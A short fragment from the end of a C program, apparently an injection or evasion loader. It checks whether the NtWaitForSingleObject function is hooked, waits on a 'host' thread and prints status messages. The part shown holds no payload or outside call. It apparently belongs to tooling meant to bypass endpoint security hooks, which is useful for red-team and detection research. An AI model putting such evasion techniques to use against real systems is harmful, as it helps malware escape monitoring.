394 |     else {
395 |         printf("[+] NtWaitForSingleObject Not Hooked\n");
396 |     }
397 | 
398 | 
399 |     NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout);
400 |     if (!NT_SUCCESS(NTWFSOstatus)) {
401 |         printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError());
402 |         return 4;
403 |     }
404 | 
405 |     printf("[+] Finished !!!!\n");
406 | 
407 |     return 0;
408 | 
409 | }


--------------------------------------------------------------------------------